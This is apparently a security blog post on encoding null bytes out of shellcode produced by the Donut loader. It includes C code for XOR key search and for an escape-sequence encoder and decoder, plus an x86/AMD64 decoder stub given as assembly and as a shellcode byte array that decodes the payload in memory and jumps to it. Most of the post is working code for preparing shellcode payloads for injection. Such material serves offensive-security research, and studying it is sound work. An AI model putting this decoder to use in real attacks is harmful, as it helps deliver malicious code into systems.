Shellcode: Encoding Null Bytes Faster With Escape Sequences

Introduction

Quick post about a common problem removing null bytes in the loader generated by Donut. Replacing opcodes that contain null bytes with equivalent snippets is enough to solve the problem for a shellcode of no more than a few hundred bytes. It’s also possible to automate using encoders found in msfvenom and pwntools. However, the problem most users experience is when the loader generated by Donut is a few hundred kilobytes or even a few megabytes! This post demonstrates how to use escape sequences to facilitate faster encoding of null bytes. Maybe “escape codes” is a better description? You can find a PoC encoder here, which can be used to add an x86/AMD64 decoder to a shellcode generated by Donut.

XOR Cipher

Readers will be aware of the eXclusive-OR (XOR) cipher and its extensive use as a component or building block in many cryptographic primitives. It’s also a popular choice for obfuscating shellcode and specifically removing null bytes. In the past, the following code in C is what I’d probably use to find a suitable key. It will work with keys of any length, but is slow as hell for anything more than 24-Bits.

int find_xor_key(
  const void *inbuf, u32 inlen, 
  void *outbuf, int outlen) 
{
    int i, j, keylen=1;
    u8  *in = (u8*)inbuf, *key=(u8*)outbuf;
    
    // initialize key
    for(i=0; i<outlen; i++) {
      key[i] = (i < keylen) ? 0 : -1;
    }
    
    // while keylen is less than max key requested
    while(keylen < outlen) {
      // xor data with current key
      for(i=0; i<inlen; i++) {
        // if the result of xor is zero. end loop
        if((in[i] ^ key[i % keylen]) == 0) break;
      }
      // if we processed all data successfully
      if(i == inlen) {
        // return current key and its length
        return keylen;
      }
      // otherwise, update the key
      for(i=0; ; i++) {
        if(++key[i]) break;
      }
      // update the key length
      if(i == keylen) keylen++;
    }
    // return nothing found
    return 0;
}

The following function can be used to test it and works relatively fast for something that’s compact, like 1KB, but sucks for anything > 3072 bytes, which I admit is unusual for shellcode.

void test_key(void) {
    int i, keylen;
    u8  key[8], data[1024];
    
    srand(time(0));
    
    // fill buffer with pseudo-random bytes
    for(i=0; i<sizeof(data); i++) {
      data[i] = rand();
    }
    // try find a suitable XOR key for the data
    keylen = find_xor_key(data, sizeof(data), key, sizeof(key));
    
    printf("Suitable key %sfound.\n\n", 
      keylen ? "" : "could not be ");
    
    if(keylen) {
      printf("Key length : %i\nKey        : ", keylen);
      while(keylen--) {
        printf("%02x ", key[keylen]);
      }
      putchar('\n');
    }
}

find_xor_key() could be re-written to use multiple threads and this would speed up the search. You might even be able to use a GPU or cluster of computers, but the overall problem isn’t finding a key. We’re not trying to crack ciphertext. All we want to do is encode and later decode null bytes, and for the Donut loader, this approach is very inefficient.

Encoding Algorithm

Escape sequences have been used in computing since the 1970s and most of you will already be familiar with them. I’m not sure if I’m using the correct terminology for what I describe next, but hopefully you’ll understand why I did. Textual encoding algorithms like Base64, Ascii85 and BasE91 were considered first of course. And Qkumba wrote a very cool base64 decoder that uses just ASCII characters that I was very tempted to use. In the end, using an escape code to indicate a null byte is simpler to implement.

  1. Read a byte from the input file or stream and assign to X.
  2. Assign X plus 1 to Y.
  3. If Y is not 0 or 1, goto step 6.
  4. Save the escape sequence 0x01 to the output file or stream.
  5. XOR X with predefined 8-Bit key K, goto step 7.
  6. Add 1 to X.
  7. Save X to the output file or stream.
  8. Repeat step 1-7 until EOF.

Although I use an XOR cipher in step 5, it could be replaced with something else.

static
void nullz_encode(FILE *in, FILE *out) {
    char c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // adding one is just an example
      t = c + 1;
      // is the result 0(avoid) or 1(escape)?
      if(t == 0 || t == 1) {
        // write escape sequence
        putc(0x01, out);
        // The XOR is an optional step.
        // Avoid using 0x00 or 0xFF with XOR!
        putc(c ^ NULLZ_KEY, out);
      } else {
        // save byte plus 1
        putc(c + 1, out);
      }
    }
}

Decoding Algorithm

  1. Read a byte from the input file or stream and assign to X.
  2. If X is not an escape sequence 0x01, goto step 5.
  3. Read a byte from the input file or stream and assign to X.
  4. XOR X with predefined 8-Bit key K used for encoding, goto step 6.
  5. Subtract 1 from X.
  6. Save X to the output file or stream.
  7. Repeat steps 1-6 until EOF.
static
void nullz_decode(FILE *in, FILE *out) {
    char c, t;
    
    for(;;) {
      // read byte
      c = getc(in);
      // end of file? exit
      if(feof(in)) break;
      // if this is an escape sequence
      if(c == 0x01) {
        // read next byte and XOR it
        c = getc(in);
        // The XOR is an optional step.
        putc(c ^ NULLZ_KEY, out);
      } else {
        // else subtract byte
        putc(c - 1, out);
      }
    }
}

x86/AMD64 assembly

This assembly is compatible with both 32-Bit and 64-bit modes. It expects to run from RWX memory, so YMMV with this. If you want to execute from RX memory only, then this will require allocation of memory on the stack.

    bits   32
    
    %define NULLZ_KEY 0x4D
    
nullz_decode:
_nullz_decode:
    jmp    init_code
load_code:
    pop    esi
    lodsd                    ; load original length of data
    xor    eax, 0x12345678   ; change to 32-bit key    
    xchg   eax, ecx
    push   esi               ; save pointer to code on stack
    pop    edi               ; 
    push   esi
decode_main:
    lodsb                    ; read a byte
    dec    al                ; c - 1
    jnz    save_byte
    lodsb                    ; read next byte
    xor    al, NULLZ_KEY     ; c ^= NULLZ_KEY
save_byte:
    stosb                    ; save in buffer
    loop   decode_main
    ret                      ; execute shellcode
init_code:
    call   load_code
    ; XOR encoded shellcode goes here..

Building the Loader

  1. Allocate memory to hold the decoder, 32-bits for the original length of input file and file data itself.
  2. Copy the decoder to memory.
  3. Set the key in decoder that will decrypt the original length. The offset of this value is defined by NULLZ_LEN.
  4. Set the original length, encrypted with XOR, right after the decoder.
  5. Set input file data right after the original length.
  6. Save memory to file.

An option to update the XOR key is left up to you.

// compatible with x86 and x86-64
char NULLZ_DECODER[] = {
  /* 0000 */ "\xeb\x17"             /* jmp   0x19            */
  /* 0002 */ "\x5e"                 /* pop   esi             */
  /* 0003 */ "\xad"                 /* lodsd                 */
#define NULLZ_LEN 5
  /* 0004 */ "\x35\x78\x56\x34\x12" /* xor   eax, 0x12345678 */
  /* 0009 */ "\x91"                 /* xchg  eax, ecx        */
  /* 000A */ "\x56"                 /* push  esi             */
  /* 000B */ "\x5f"                 /* pop   edi             */
  /* 000C */ "\x56"                 /* push  esi             */
  /* 000D */ "\xac"                 /* lodsb                 */
  /* 000E */ "\xfe\xc8"             /* dec   al              */
  /* 0010 */ "\x75\x03"             /* jne   0x15            */
  /* 0012 */ "\xac"                 /* lodsb                 */
  /* 0013 */ "\x34\x4d"             /* xor   al, 0x4d        */
  /* 0015 */ "\xaa"                 /* stosb                 */
  /* 0016 */ "\xe2\xf5"             /* loop  0xd             */
  /* 0018 */ "\xc3"                 /* ret                   */
  /* 0019 */ "\xe8\xe4\xff\xff\xff" /* call  2               */
};

Summary

Before settling with escape sequences, I examined a number of other ways that null bytes might be encoded and decoded at runtime by a shellcode.

Initially, I thought of byte substitution, which is a non-linear operation used by legacy block ciphers. Scrapped that idea.

Experimented with match referencing, which is very common for lossless compression algorithms. Wrote a few bits of code to process files and then calculate the change in size. For every null byte found in a file, save the position and length before passing the null bytes to a function F for modification. An involution, like an XOR is fine to use as F. Then encode the offset and length using elias gamma2 codes. The change in file size was approx. 4% and I thought this might be the best way. It requires more code and is more complicated, but certainly an option.

Thought about bit tags. Essentially using 1-Bit to indicate whether a byte is encoded or not. Change in file size would be ~12% since every byte would require 1-Bit. This eventually led to escape sequences, which I think is the best approach.

This entry was posted in assembly, donut, security, shellcode, windows and tagged , , . Bookmark the permalink.

1 Response to Shellcode: Encoding Null Bytes Faster With Escape Sequences

  1. Pingback: Windows Process Injection: EM_GETHANDLE, WM_PASTE and EM_SETWORDBREAKPROC | modexp

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out /  Change )

Twitter picture

You are commenting using your Twitter account. Log Out /  Change )

Facebook photo

You are commenting using your Facebook account. Log Out /  Change )

Connecting to %s